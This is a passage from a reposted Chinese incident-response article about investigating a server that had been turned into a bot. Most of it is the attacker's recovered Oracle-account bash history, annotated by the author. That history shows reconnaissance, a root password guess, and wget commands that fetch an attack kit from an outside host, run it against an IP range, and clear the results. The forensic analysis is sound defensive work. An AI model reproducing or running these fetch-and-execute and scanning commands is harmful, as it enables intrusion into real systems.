加入收藏 | 设为首页 | 会员中心 | 我要投稿 威海站长网 (https://www.0631zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长资讯 > 外闻 > 正文

一次服务器沦陷为肉鸡后的实战排查过程!

发布时间:2019-06-11 09:36:32 所属栏目:外闻 来源:民工哥技术之路
导读:1、从防火墙瘫痪说起 今天还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏览网页。急急忙忙感到公司,开始查找问题。 首先排除了交换机故障,因为内部局域网正常。当ping防火墙设备时,丢包严重。很明显,防火墙出了问题,撑不

下面看看黑客用oracle账户都做了什么。首先复制一份oracle的命令历史,防止后续操作丢失该记录。

  1. cp /home/oracle/.bash_history hacker_history 

然后查看分析这个文件。 我在后面备注了黑客的想法。

  1. vi .bash_profile 
  2. vi .bash_profile (查看.bash_profile,看变量设置,把/home/oracle/bin增加到PATH) 
  3. ll 
  4. cd / 
  5. vi .bash_profile 
  6. vi .bash_profile (执行,设置环境变量) 
  8. ps x (查看系统运行进程) 
  9. free -m (查看内存大小) 
  10. uname -a (查看系统版本) 
  11. cat /etc/issue (查看系统发行版) 
  12. cat /etc/hosts (查看是否有网内机器) 
  13. cat /proc/cpuinfo (查看CPU型号) 
  14. cat .bash_history (查看oracle账户历史操作) 
  15. w (查看系统负载) 
  16. ls -a (查看/home/oracle/下的隐藏文件) 
  17. passwd (修改掉oracle账户的密码) 
  18. exit  
  19. ls  
  20. oracle 
  21. sqlplus (运行sqlplus) 
  22. su (试图切换到root账户) 
  23. app1123456 (猜测root密码) 
  24. ls  
  25. su - 
  27. free -m 
  28. php -v (查看php版本) 
  29. exit 
  31. free -m 
  32. php -v 
  33. ps aux 
  34. ls -a 
  35. exit 
  37. free -m 
  38. php -v 
  39. cat bash_his (查看历史命令) 
  40. cat bash_history 
  41. cat .bash_history 
  42. wget scriptcoders.ucoz.com/piata.tgz (下载肉鸡攻击软件包) 
  43. tar zxvf piata.tgz (解压软件包) 
  44. rm -rf piata.tgz (删除软件包) 
  45. cd piata/ (切换到攻击软件目录) 
  46. ls -a 
  47. chmod +x * 
  48. ./a 210.212 (运行攻击软件) 
  49. screen (试图运行screen命令,发现没有后下载它) 
  50. ls -a 
  51. wget scriptcoders.ucoz.com/screen.tgz 
  52. tar zxvf screen.tgz (解压) 
  53. ./screen 
  54. exit 
  56. ps x 
  57. cd piata/ (切换到攻击软件目录) 
  58. ls -a 
  59. cat vuln.txt (查看攻击结果) 
  60. ls -a 
  61. mv vuln.txt 1.txt (保存攻击结果) 
  62. ./screen -r 
  63. nano 1.txt (查看结果文件) 
  65. ps x 
  66. exit 
  67. cd piata 
  68. ps x 
  69. ls -a 
  70. nano 2.txt 
  71. exit 
  73. ps x 
  74. cd piata/ 
  75. ls -a 
  76. cat  
  77. mv vuln.txt 2.txt (保存结果) 
  78. nano 2.txt 
  80. ps x 
  81. cd piata/ 
  82. ls- a 
  83. cat vuln.txt  
  84. rm -rf vuln.txt  
  85. ./screen -r 
  86. exit 
  88. ps x 
  89. cd piata/ 
  90. ls -a 
  91. cat vuln.txt  
  92. ls -a 
  93. mv vuln.txt 3.txt (保存结果) 
  94. nano 3.txt  
  95. exit 
  97. ps x 
  98. cd piata/ 
  99. ls -a 
  100. cat vuln.txt  
  101. rm -rf vuln.txt  
  102. exit 
  104. ps x 
  105. cd piata/ 
  106. ls -a 
  107. cat vuln.txt  
  108. rm -rf vuln.txt  
  109. rm -rf 1.txt  
  110. rm -rf 2.txt 
  111. rm -rf 2.txt.save  
  112. rm -rf 3.txt  
  113. screen -r 
  114. ./screen -r 
  115. exit 
  117. ps x 
  118. cd piata/ 
  119. ls -a 
  120. cat vuln.txt  
  121. ls -a 
  122. nano vuln.txt  
  123. rm -rf vuln.txt  
  124. screen -r 
  125. ./screen -r 
  126. exit 
  128. ps x 
  129. cd piata/ 
  130. ls -a 
  131. cat vuln.txt  
  132. nano vuln.txt  
  134. ls -a 
  135. rm -rf vuln.txt  
  136. screen -r 
  137. ./screen -r 
  138. exit 
  140. ps x 
  141. cd piata/ 
  142. ls -a 
  143. cat vuln.txt  
  144. rm -rf vuln.txt  
  145. ps x 
  146. ls -a 
  147. ./screen -r 
  148. exit 
  150. ps x 
  151. cd piata/ 
  152. ls -a 
  153. cat vuln.txt  
  154. nano vuln.txt  
  156. rm -rf vuln.txt  
  157. ./screen -r 
  158. exit 

3.3 攻击工具一览

(编辑:威海站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.0631zz.com/ All Rights Reserved. 威海站长网